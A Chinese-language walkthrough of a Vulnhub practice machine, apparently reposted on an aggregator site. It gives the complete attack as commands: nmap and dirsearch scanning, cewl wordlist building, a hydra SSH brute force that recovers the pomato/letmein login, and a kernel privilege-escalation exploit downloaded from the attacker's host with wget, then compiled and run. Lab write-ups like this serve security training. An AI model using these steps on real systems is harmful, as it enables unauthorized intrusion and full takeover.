Vulnhub靶机实战

您所在的位置:网站首页 potat下载 Vulnhub靶机实战

Vulnhub靶机实战

2023-10-12 17:25| 来源: 网络整理| 查看: 265

声明

好好学习,天天向上

搭建

vmware打开,网络和攻击机一样,要么都用桥接要么都用NAT

渗透

存活扫描,发现目标

arp-scan -l

端口扫描

nmap -T4 -A 192.168.31.164 -p 1-65535 -oN nmap.A

在这里插入图片描述

开启端口

发现开启80,7120

7120ssh没有用默认端口,好评

访问80

http://192.168.31.164

竟然是个图像大土豆

在这里插入图片描述

果断扫描目录

python3 dirsearch.py -u 192.168.31.164

在这里插入图片描述

info.php可以看到一些敏感信息,并无什么特别的发现,80没发现什么,也没有多余的目录可以继续探索,只能爆破了

爆破吧

先生成社工字典

cewl http://192.168.31.164/ -w user.dic

注意把首字母变成小写再来一遍

在这里插入图片描述

git上拿到top1000字典

https://github.com/k8gege/PasswordDic/blob/master/top1000.txt

hydra爆破ssh

hydra -L user.dic -P top1000.txt -vV ssh://192.168.31.164:7120 -f pomato/letmein

在这里插入图片描述

ssh登录

ssh -p 7120 [email protected] letmein

在这里插入图片描述

准备提权,kali执行

searchsploit 3.13.0 cp /usr/share/exploitdb/exploits/linux/local/37292.c ./37292.c python -m SimpleHTTPServer 5555

靶机执行

cd /tmp wget http://192.168.31.64:5555/37292.c gcc 37292.c -o exp chmod +x exp ./exp

在这里插入图片描述

总结

1.信息收集

端口发现80和7120

80只发现了phpinfo

7120是ssh

2.web权限

3.shell权限

通过ssh爆破,使用top1000字典,爆破进去了7120

4.权限维持

5.提权

通过系统内核进行提权



【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3